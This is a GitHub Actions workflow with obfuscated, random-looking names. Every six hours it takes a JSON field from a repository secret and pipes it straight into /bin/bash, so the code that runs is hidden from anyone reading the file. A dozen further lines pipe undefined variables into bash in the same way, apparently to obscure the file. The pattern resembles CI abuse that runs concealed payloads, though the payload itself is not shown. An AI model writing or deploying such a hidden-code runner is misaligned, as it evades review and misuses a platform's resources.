name: yuanriyue3461

on:
  workflow_dispatch:
  schedule:
    - cron: '59 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuanriyue3461
        env:
          u5: ${{ secrets.u5 }}
        run: |
          echo $u5 | jq -r .gbvo09548 | /bin/bash
          echo $iq07 | jq -r .v86 | /bin/bash
          echo $nsbah836 | jq -r .poip1 | /bin/bash
          echo $zz5 | jq -r .nm7581 | /bin/bash
          echo $xbx444 | jq -r .uqgf2 | /bin/bash
          echo $wglh33 | jq -r .xzv758 | /bin/bash
          echo $jsq3 | jq -r .nf54 | /bin/bash
          echo $hu84 | jq -r .mreo86 | /bin/bash
          echo $yw35385 | jq -r .svfw1 | /bin/bash
          echo $qk77538 | jq -r .yzdho37587 | /bin/bash
          echo $tp892 | jq -r .mv261 | /bin/bash
          echo $ly37951 | jq -r .clw7502 | /bin/bash
          echo $mh1631 | jq -r .qzxp3 | /bin/bash

